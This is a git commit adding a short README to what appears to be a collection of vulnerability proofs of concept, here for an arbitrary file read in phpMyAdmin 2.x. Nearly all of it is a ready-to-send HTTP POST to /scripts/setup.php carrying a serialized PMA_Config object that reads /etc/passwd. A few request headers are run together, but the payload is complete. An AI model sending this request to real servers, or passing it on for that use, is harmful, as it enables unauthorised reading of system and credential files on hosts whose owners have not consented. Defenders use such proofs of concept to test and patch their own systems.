add phpmyadmin 任意文件读取漏洞

2022-03-01 16:38:35 +08:00 · 2022-03-01 16:38:35 +08:00 · b9ae455d15
commit b9ae455d15
parent 2324d960af
1 changed files with 19 additions and 0 deletions
--- a/任意文件读取漏洞/README.md
+++ b/任意文件读取漏洞/README.md
@ -0,0 +1,19 @@
+
+## 受影响版本
+phpMyAdmin version
+	2.x版本
+
+## poc 
+```http request
+POST /scripts/setup.php HTTP/1.1 
+Host: your-ip:8080
+Accept-Encoding: gzip, deflate Accept: */*
+Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trid ent/5.0)
+Connection: close
+Content-Type: application/x-www-form-urlencoded 
+Content-Length: 80
+
+
+action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
+
+```